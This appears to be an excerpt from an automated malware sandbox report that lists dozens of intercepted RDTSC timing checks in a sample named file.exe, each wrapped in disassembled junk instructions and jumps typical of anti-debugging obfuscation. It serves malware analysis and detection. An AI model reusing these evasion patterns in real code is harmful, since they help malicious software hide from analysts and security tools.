                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D365A second address: 8D366A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jp 00007F7F1CE19AA6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D37A3 second address: 8D37AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D37AA second address: 8D37CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F1CE19AABh 0x00000008 jmp 00007F7F1CE19AB2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D3986 second address: 8D398A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845173 second address: 845177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845177 second address: 84519F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7F1D21A770h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F7F1D21A76Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D84ED second address: 8D84F7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7F1CE19AA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D84F7 second address: 8D8501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8803ED second address: 88044D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007F7F1CE19AA6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F7F1CE19AB0h 0x00000016 popad 0x00000017 pop ebx 0x00000018 nop 0x00000019 jmp 00007F7F1CE19AADh 0x0000001e mov ebx, dword ptr [ebp+12481424h] 0x00000024 jo 00007F7F1CE19AA8h 0x0000002a mov cl, dl 0x0000002c add eax, ebx 0x0000002e jnl 00007F7F1CE19ABAh 0x00000034 nop 0x00000035 push eax 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88044D second address: 8804A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 jg 00007F7F1D21A771h 0x0000000d nop 0x0000000e mov ecx, ebx 0x00000010 push 00000004h 0x00000012 mov cl, 34h 0x00000014 nop 0x00000015 push edx 0x00000016 jmp 00007F7F1D21A777h 0x0000001b pop edx 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F7F1D21A778h 0x00000025 jg 00007F7F1D21A766h 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D949B second address: 8D94AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AAAh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D94AF second address: 8D94C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1D21A76Eh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D94C4 second address: 8D94EF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F1CE19AB2h 0x00000008 jmp 00007F7F1CE19AABh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F7F1CE19AA8h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E6E21 second address: 8E6E26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E6E26 second address: 8E6E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F7F1CE19AB4h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jc 00007F7F1CE19AAAh 0x00000017 push eax 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pushad 0x0000001b popad 0x0000001c pop eax 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 jo 00007F7F1CE19AA6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E55B8 second address: 8E55D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F7F1D21A766h 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F7F1D21A76Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E55D0 second address: 8E55D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E55D4 second address: 8E55E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A76Eh 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E590C second address: 8E5930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F1CE19AB1h 0x0000000d pushad 0x0000000e ja 00007F7F1CE19AA6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5930 second address: 8E5935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5E45 second address: 8E5E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F1CE19AB0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5E5A second address: 8E5E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E6382 second address: 8E638C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7F1CE19AA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E638C second address: 8E63AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A775h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E63AB second address: 8E63AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E63AF second address: 8E63C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A76Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E63C4 second address: 8E63D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F7F1CE19AAAh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E9DA4 second address: 8E9DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E9DAC second address: 8E9DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA09C second address: 8EA0A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA0A2 second address: 8EA0C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jp 00007F7F1CE19AA6h 0x0000000d jmp 00007F7F1CE19AB9h 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA0C9 second address: 8EA0F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7F1D21A76Bh 0x00000008 jnp 00007F7F1D21A766h 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F7F1D21A776h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA5BC second address: 8EA5D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1CE19AB8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA9D2 second address: 8EA9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EA9D6 second address: 8EA9DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF5EE second address: 8EF5F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF5F7 second address: 8EF618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jnp 00007F7F1CE19AAEh 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF618 second address: 8EF61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7D51 second address: 8F7D88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AB9h 0x00000007 jmp 00007F7F1CE19AAEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F7F1CE19AC4h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7D88 second address: 8F7D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7D8C second address: 8F7D9B instructions: 0x00000000 rdtsc 0x00000002 js 00007F7F1CE19AA6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6146 second address: 8F614A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F614A second address: 8F6159 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F1CE19AA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F637D second address: 8F638A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F1D21A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F638A second address: 8F6390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F669D second address: 8F66A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6AE5 second address: 8F6AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6AE9 second address: 8F6B0C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jbe 00007F7F1D21A766h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F1D21A773h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6B0C second address: 8F6B1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AAAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6B1A second address: 8F6B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6B20 second address: 8F6B25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6B25 second address: 8F6B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007F7F1D21A772h 0x0000000d popad 0x0000000e je 00007F7F1D21A772h 0x00000014 jc 00007F7F1D21A766h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6B4E second address: 8F6B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F7F1CE19AB4h 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6E35 second address: 8F6E40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007F7F1D21A766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7BCF second address: 8F7BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB27A second address: 8FB280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB280 second address: 8FB28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB28B second address: 8FB299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 js 00007F7F1D21A766h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB299 second address: 8FB2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F7F1CE19AB0h 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB2B0 second address: 8FB2BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F7F1D21A766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB2BB second address: 8FB2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F7F1CE19AA6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F7F1CE19AA6h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB2D2 second address: 8FB2D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC94D second address: 8FC97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1CE19AB6h 0x00000009 popad 0x0000000a jng 00007F7F1CE19AB7h 0x00000010 jmp 00007F7F1CE19AB1h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90199C second address: 9019D7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F1D21A766h 0x00000008 jc 00007F7F1D21A766h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F7F1D21A770h 0x00000017 jmp 00007F7F1D21A76Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007F7F1D21A766h 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901509 second address: 901512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901512 second address: 90151E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7F1D21A766h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90151E second address: 901522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901522 second address: 901526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 903F25 second address: 903F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F1CE19AB3h 0x0000000d jnl 00007F7F1CE19AA6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90E23B second address: 90E266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7F1D21A76Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F7F1D21A766h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910A55 second address: 910A9C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F7F1CE19AD3h 0x0000000e jmp 00007F7F1CE19AB9h 0x00000013 jmp 00007F7F1CE19AB4h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7F1CE19AAAh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910BFA second address: 910C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910C01 second address: 910C26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1CE19AB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910C26 second address: 910C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910C2A second address: 910C30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910C30 second address: 910C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913441 second address: 913451 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7F1CE19AA8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913451 second address: 913455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8435B9 second address: 8435D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007F7F1CE19AD7h 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F7F1CE19AA6h 0x00000013 js 00007F7F1CE19AA6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8435D2 second address: 8435E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A76Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E867 second address: 91E86D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E86D second address: 91E876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846BD5 second address: 846BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846BDA second address: 846C12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1D21A776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F7F1D21A76Dh 0x0000000f jc 00007F7F1D21A76Ch 0x00000015 jng 00007F7F1D21A766h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846C12 second address: 846C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846C16 second address: 846C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92599A second address: 9259A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9259A0 second address: 9259AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F7F1D21A76Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9259AD second address: 9259C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F7F1CE19AB4h 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92584C second address: 92585F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F7F1D21A766h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92585F second address: 925863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E806 second address: 92E822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7F1D21A76Fh 0x0000000c jg 00007F7F1D21A766h 0x00000012 rdtsc
